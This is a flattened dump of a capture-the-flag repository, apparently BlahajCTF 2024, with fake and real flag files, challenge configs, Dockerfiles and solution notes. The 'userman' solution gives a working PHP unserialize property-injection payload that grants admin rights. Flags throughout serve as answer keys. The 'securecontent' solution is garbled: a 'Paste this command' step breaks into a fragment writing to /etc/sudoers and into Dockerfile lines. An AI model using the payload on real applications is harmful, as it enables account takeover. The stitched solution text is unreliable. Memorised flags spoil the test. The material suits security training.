https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag77.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag78.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag78.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag79.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag79.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag8.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag80.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag80.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag81.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag81.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag82.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag82.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag83.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag83.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag84.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag84.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag85.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag85.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag86.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag86.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag87.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag87.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag88.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag88.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag89.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag89.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag9.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag9.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag90.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag90.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag91.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag91.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag92.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag92.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag93.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag93.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag94.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag94.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag95.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag95.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag96.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag96.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag97.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag97.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag98.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag98.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag99.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag99.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/theactuallyrealflag: -------------------------------------------------------------------------------- 1 | blahaj{fL45k_D3veL0p0r} -------------------------------------------------------------------------------- 
/Challenges/Web/screenshooter/src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask~=1.1.4 2 | markupsafe==2.0.1 -------------------------------------------------------------------------------- /Challenges/Web/securecontent/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Secure Content 2 | author: fern 3 | category: web 4 | description: I know there is an XSS somewhere in my website, but surely CSP will protect me, right? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{D4nG13_tH3_MArKuP} 13 | 14 | files: 15 | - dist/app.py 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Web/securecontent/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Paste this command: 4 | `> /etc/sudoers 10 | USER 1001 11 | CMD [ "./main.py" ] 12 | EXPOSE 8000 -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.0.1 2 | waitress==2.1.2 3 | Werkzeug==2.2.2 -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/blahaj.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/blahaj.jpg -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/djungelskog.avif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/djungelskog.avif -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/ikea.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/ikea.png -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/neon-cat-cute.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/neon-cat-cute.gif -------------------------------------------------------------------------------- /Challenges/Web/userman/challenge.yml: -------------------------------------------------------------------------------- 1 | name: User Management System 2 | author: fern 3 | category: web 4 | description: BlahajCorp just released a new User Management System to manage its employees across different divisions! Can you hack it and turn yourself into the admin? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{d1Dnt_kN0w_pHP_C0u1D_0V3rf10W} 13 | 14 | files: 15 | - dist/chal.php 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Web/userman/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This is a PHP overflow challenge. 
Read [https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/](https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/) The "overflow" is a length mismatch in PHP serialized data, not a memory overflow: in the linked write-up, each literal `\0\0\0` in a stored value is rewritten to a shorter NUL-`*`-NUL sequence after the `s:N` length has already been fixed, so `unserialize()` reads past the username into the password field and accepts the properties injected there (`_password`, `_admin`). `chal.php` is not reproduced on this page, so treat this as the presumed root cause; the fix is to never rewrite a string after it has been serialized and to avoid `unserialize()` on data built from user input. 4 | 5 | Solve: 6 | 1. Create account, set username to `\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0` and password to `ab";s:12:"\0\0\0_password";s:3:"abc";s:9:"\0\0\0_admin";b:1;s:12:"\0\0\0_reserved";s:47:"` 7 | 2. Log in with username `\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0` and password `abc` 8 | 9 | Flag: `blahaj{d1Dnt_kN0w_pHP_C0u1D_0V3rf10W}` -------------------------------------------------------------------------------- /Challenges/Web/userman/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8.2-apache 2 | COPY src/ /var/www/html/ 3 | #COPY src/000-default.conf /etc/apache2/000-default.conf 4 | COPY src/000-default.conf /etc/apache2/sites-available/000-default.conf 5 | COPY src/ports.conf /etc/apache2/ports.conf 6 | RUN mkdir /var/www/html/databases 7 | RUN chmod 777 /var/www/html/databases 8 | EXPOSE 8000 9 | CMD ["apache2-foreground"] -------------------------------------------------------------------------------- /Challenges/Web/userman/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | userman: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/userman/src/src/.htaccess: -------------------------------------------------------------------------------- 1 | DirectoryIndex index.php -------------------------------------------------------------------------------- /Challenges/Web/userman/src/src/ports.conf: -------------------------------------------------------------------------------- 1 | 2 | Listen 8000 3 | 4 | 5 | Listen 443 6 | 7 | 8 | 9 | Listen 443 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # blahajctf24 2 | BlahajCTF Challenge repository 2024 3 | --------------------------------------------------------------------------------